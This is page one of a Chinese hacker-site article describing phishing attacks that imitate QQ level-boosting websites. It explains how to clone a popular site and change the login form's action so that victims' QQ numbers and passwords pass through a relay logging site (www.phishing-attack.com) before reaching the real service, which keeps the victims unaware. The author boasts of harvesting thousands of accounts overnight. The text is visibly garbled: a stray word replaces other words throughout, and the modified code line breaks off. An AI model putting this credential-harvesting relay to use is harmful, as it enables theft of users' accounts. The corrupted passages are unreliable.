网络钓鱼式攻击 挂QQ等级网站

• 文章作者：HaK_BaN[BCT]（www.cnbct.org）
  信息来源：邪恶八进制信息聊天团队（www.eviloctal.com）
  备注：本文已经刊登在9月《聊天手册》中，转载时请标明出处以及文章完整性，本文首发漏洞中心小组，后作者友情提交到邪恶八进制。
  　 不知道从什么时候开始网络上就开始兴起了挂聊天 的风潮,谁都为了腾讯所谓的等级在不断的挂Q 挂Q,就连挂着QQ
  拿个等级有啥作用也不知道的人,看着别人有自己没有就感觉特不爽,所以慢慢的挂Q成为了一种时尚,也成为了一种新的业务.网上各种各类的挂QQ网聊天层出不穷,而且没有丝毫的减少,但是有没有人去怀疑你所使用的挂QQ
  网站是不是真的安全了?
  为了保护作者以及杂志社本身请大家看完”免责声明”后方可阅读.
  免责声明：
  作者无法鉴别判断读者阅读本文后的用途，如果读者在阅读本文后违反国家法律规定而出现的纠纷与及不良结果，由行为人独立承担所有责任，本文的作者以及刊登该文章的杂志社均不负责也不承担任何法律责任。
  　 现在盗取任何聊天聊天的号码,不外乎就是利用盗号软件以及键盘记录软件记录被种植主机的账号以及密码,这种累赘而又需要多方软件支持的手法已经过时了,而现在行之有效的就是利用无污染(不需要软件以及任何聊天)去进行的盗取账号密码的网络钓鱼攻击,网络钓鱼已经变成了黑客以及一些不法分子用来进行银行账号以及等等相关敏感信息盗取的最有效最快速的途径,而我们也可以利用网络钓鱼在一夜之间拥有成千上万的QQ
  号以及密码(甚至于QQ 密保信息).首先钓鱼者本身是会仿冒一个挂QQ 的网站页面,因为要致使访问者可以相信,所以在仿冒会根据时下最多人访问的挂QQ
  网站进行设计
  　
  仿冒好一个虚假的网站之后,钓鱼者本身会想办法如何去保存所钓到的资料,通常在钓鱼网站中都会采取本地记录相关资料,但是整个用户的使用流程就会在输入账号以及密码后出现问题,就是说钓鱼者自身会想个借口出来说:”该系统因系统繁忙,暂时无法为你服务!”等等的理由,让被钓者信服,但是现在作为被钓者本身已经不再这么的愚蠢,所以传统的钓鱼模式已经无法行得通.为了可以使被钓者整个使用流程不会出现任何的怀疑,所以钓鱼者会在提交处做一定的手脚.让我们看看例子:
  Code:
  }
  function
  Login()
  {window.open("about:blank","qqLogin",
  
  "width=400,height=300,resizable=no,scrollbars=no,status=no,toolbar=no,menubar=no,location=n
  o");
  document.QQForm.target
  = "qqLogin";
  document.QQForm.action =
  "login.asp";
  document.QQForm.submit();
  }
  因为篇幅关系删除多余语句
  从上面的代码我们可以看到,这是一个正常挂Q网站的登录页面代码,当用户访问网站的时候,输入的账号以及密码就会提交给login.asp
  页面,然后再转去挂Q系统.如果作为钓鱼者本身想完美的结合真实的挂Q
  网站去完成整个操作流程,那样子他就必须在这个提交页面做一些聊天改,使到被钓者的信息先存储在自定的地方,然后再转发到真实的挂Q
  网站,所以钓鱼者会有可能的把代码提交的语句修改为:
  Code:
  document.QQForm.action =
  "聊天
  　
  在这里我们可以看到钓鱼者把提交的数据转发过去了www.phishing-attack.com的网站,为了避免数据会被发现,所以钓鱼者利用中间站记录用户所提交的信息.可能大家会问到那整个钓鱼过程是怎么样的了?我给一个比较简单的过程大家看看
  钓鱼网站--------------中间记录站----------------真实挂Q网站
  　 当用户访问的时候,会将密码提交给钓鱼网站,钓鱼网站会把数据转去中间记录站,然后在中间记录站进行数据的保存,再次将用户所提交的数据提交给真实的挂Q网站,这样子在过程中用户不单止可以完成整个操作的流程,并且钓鱼者本身可以记录密码信息延长整个钓鱼网站的生命周期(作者注:通常钓鱼网站自身的生命周期为15
  
• [1] [2] 下一页 
• 复制本页网址和标题，发送给你QQ/Msn的好友一起分享
  
  
• 网络钓鱼式攻击 挂QQ等级网站 相关文章：
• ·台湾500大网站排行榜
• ·精彩推荐：全Flash网站制作实例
• ·想买199元机票不容易 春秋航空订票网站瘫痪
• ·超级P2P搜索引擎让所有收费网站破产
• ·站长群大全
• ·网络玄幻小说十大网站
• ·收集的host文件网站黑名单
• ·网站推广计划的一个案例分析
• ·10大国外代理服务器网站
• ·扫图网站大全
• 网络钓鱼式攻击 挂QQ等级网站 相关软件
• ·网站全额下载器 V2004
• ·韩国公司展示网站界面网页模板
• ·韩国绿色房产公司网站界面网页模板
• ·韩国女性网站界面网页模板
• ·韩国餐饮美食类网站界面网页模板
• ·韩国汽车展销公司网站界面网页模板
• ·韩国web服务公司网站界面网页模板
• ·韩国学校教育门户网站界面网页模板
• ·韩国少年培训学校网站界面网页模板
• ·韩国小区生活网站界面网页模板

上一篇:华丽背后的秘密！苹果最新iMac G5拆解

下一篇:搜索引擎排名算法新趋势

• 特别声明：本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载，但请务必注明出处和原始作
• 者.文章版权归文章原始作者所有.对于被本站转载文章的个人和网站，我们表示深深的谢意。如果本站转
• 载的文章有版权问题请联系编辑人员,我们尽快予以更正. 转载请注明来源：http://www.hackhome.com

精品推荐

热点TOP10

特别推荐